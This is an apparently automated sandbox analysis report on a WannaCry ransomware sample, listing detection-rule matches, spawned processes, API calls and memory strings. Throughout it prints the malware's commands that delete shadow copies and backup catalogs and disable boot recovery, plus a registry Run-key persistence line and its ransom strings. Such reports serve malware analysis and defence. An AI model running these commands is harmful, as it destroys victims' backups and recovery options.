                  Source: @WanaDecryptor@.exe, 00000019.00000000.2870171547.000000000041F000.00000008.00000001.01000000.00000008.sdmp Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: @WanaDecryptor@.exe, 00000019.00000000.2870171547.000000000041F000.00000008.00000001.01000000.00000008.sdmp Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
                  Source: @WanaDecryptor@.exe, 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp Binary or memory string: /c vssadmin delete shadows /all /quiet &
                  Source: @WanaDecryptor@.exe, 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet &
                  Source: @WanaDecryptor@.exe, 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp Binary or memory string: /c vssadmin delete shadows /all /quiet &
                  Source: @WanaDecryptor@.exe, 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet &
                  Source: @WanaDecryptor@.exe, 0000001D.00000002.2976309612.00000000005A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietC:\Windows\S\Registry\Machine\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=16OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VB\Registry\Machine\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\GRE_InitializeFamily 6 ModJ
                  Source: @WanaDecryptor@.exe, 0000001D.00000000.2872621577.000000000041F000.00000008.00000001.01000000.00000008.sdmp Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: @WanaDecryptor@.exe, 0000001D.00000000.2872621577.000000000041F000.00000008.00000001.01000000.00000008.sdmp Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
                  Source: @WanaDecryptor@.exe, 0000001D.00000002.2975188461.000000000019B000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: u/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: @WanaDecryptor@.exe, 0000001D.00000002.2975188461.000000000019B000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ]Zvcmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 25_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,25_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 25_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,25_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 25_2_004046F0 CryptImportKey,25_2_004046F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 29_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,29_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 29_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,29_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 29_2_004046F0 CryptImportKey,29_2_004046F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 38_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,38_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 38_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,38_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 38_2_004046F0 CryptImportKey,38_2_004046F0

                  System Summary

                  Source: 2N2jefqo8e.exe, type: SAMPLE Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 2N2jefqo8e.exe, type: SAMPLE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 2N2jefqo8e.exe, type: SAMPLE Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                  Source: 29.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 38.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 25.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 50.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 25.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 46.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 50.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 29.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 38.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 46.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 0.0.2N2jefqo8e.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                  Source: 0.0.2N2jefqo8e.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 0.0.2N2jefqo8e.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                  Source: 00000000.00000000.1583437170.000000000040E000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                  Source: C:\@Please_Read_Me@.txt, type: DROPPED Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\Users\user\Desktop\r.wnry, type: DROPPED Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\Users\user\Desktop\u.wnry, type: DROPPED Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\@WanaDecryptor@.exe, type: DROPPED Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\Users\user\Desktop\140021675181576.bat, type: DROPPED Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
                  Source: 2N2jefqo8e.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: 2N2jefqo8e.exe, type: SAMPLE Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 2N2jefqo8e.exe, type: SAMPLE Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 2N2jefqo8e.exe, type: SAMPLE Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                  Source: 29.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 38.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 25.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 50.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 25.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 46.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 50.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 29.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 38.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 46.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 0.0.2N2jefqo8e.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 0.0.2N2jefqo8e.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 0.0.2N2jefqo8e.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                  Source: 00000000.00000000.1583437170.000000000040E000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                  Source: C:\@Please_Read_Me@.txt, type: DROPPED Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\Desktop\r.wnry, type: DROPPED Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\Desktop\u.wnry, type: DROPPED Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\@WanaDecryptor@.exe, type: DROPPED Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\Users\user\Desktop\140021675181576.bat, type: DROPPED Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 2N2jefqo8e.exe Static PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
                  Source: taskdl.exe.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: 2N2jefqo8e.exe, 00000000.00000003.1612265367.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLODCTR.EXEj% vs 2N2jefqo8e.exe
                  Source: C:\Windows\SysWOW64\cscript.exe Section loaded: edgegdi.dll
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Section loaded: edgegdi.dll
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe Section loaded: edgegdi.dll
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: edgegdi.dll
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "atbiaihkhzu126" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                  Source: libevent_core-2-0-5.dll.25.dr Static PE information: Number of sections : 17 > 10
                  Source: libevent-2-0-5.dll.25.dr Static PE information: Number of sections : 17 > 10
                  Source: ssleay32.dll.25.dr Static PE information: Number of sections : 18 > 10
                  Source: libeay32.dll.25.dr Static PE information: Number of sections : 18 > 10
                  Source: libgcc_s_sjlj-1.dll.25.dr Static PE information: Number of sections : 17 > 10
                  Source: libevent_extra-2-0-5.dll.25.dr Static PE information: Number of sections : 17 > 10
                  Source: libssp-0.dll.25.dr Static PE information: Number of sections : 17 > 10
                  Source: 2N2jefqo8e.exe Virustotal: Detection: 92%
                  Source: 2N2jefqo8e.exe ReversingLabs: Detection: 95%
                  Source: 2N2jefqo8e.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\SysWOW64\icacls.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Users\user\Desktop\taskse.exe Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_37-120
                  Source: C:\Users\user\Desktop\taskdl.exe Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_7-217
                  Source: unknown Process created: C:\Users\user\Desktop\2N2jefqo8e.exe C:\Users\user\Desktop\2N2jefqo8e.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe Process created: C:\Windows\SysWOW64\attrib.exe attrib +h .
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
                  Source: C:\Windows\SysWOW64\attrib.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 140021675181576.bat
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe co
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vs
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Process created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe TaskData\Tor\taskhsvc.exe
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe Process created: C:\Users\user\Desktop\taskse.exe taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "atbiaihkhzu126" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "atbiaihkhzu126" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe Process created: C:\Users\user\Desktop\taskse.exe taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe Process created: C:\Users\user\Desktop\taskse.exe taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
                  Source: C:\Windows\SysWOW64\cscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                  Source: C:\Users\user\Desktop\taskse.exe Code function: 37_2_00401000 Sleep,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,LookupPrivilegeValueA,AdjustTokenPrivileges,_local_unwind2,WaitForSingleObject,_local_unwind2,37_2_00401000
                  Source: C:\Users\user\Desktop\taskse.exe Code function: 37_2_00401398 Sleep,AdjustTokenPrivileges,37_2_00401398
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe File created: C:\Users\user\Desktop\b.wnry
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exe File created: C:\Documents and Settings\All Users\Adobe\Temp\~SDF298.tmp
                  Source: classification engine Classification label: mal100.rans.spyw.evad.winEXE@38/892@0/5
                  Source: C:\Windows\SysWOW64\cscript.exe File read: C:\Users\desktop.ini
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 25_2_00403A20 GetLogicalDrives,GetDriveTypeW,GetDriveTypeW,GetDiskFreeSpaceExW,25_2_00403A20
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3416:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3416:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:384:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:384:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
                  Source: 2N2jefqo8e.exe, 00000000.00000003.1612265367.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, 2N2jefqo8e.exe, 00000000.00000003.1955905665.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, 2N2jefqo8e.exe, 00000000.00000003.1634829824.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 2N2jefqo8e.exe, 00000000.00000003.1651673511.0000000000A53000.00000004.00000020.00020000.00000000.sdmp, 2N2jefqo8e.exe, 00000000.00000003.2865447420.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, 2N2jefqo8e.exe, 00000000.00000003.2867204725.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, 2N2jefqo8e.exe, 00000000.00000003.2953385733.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000019.00000000.2870171547.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp Binary or memory string: A.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docConnecting to 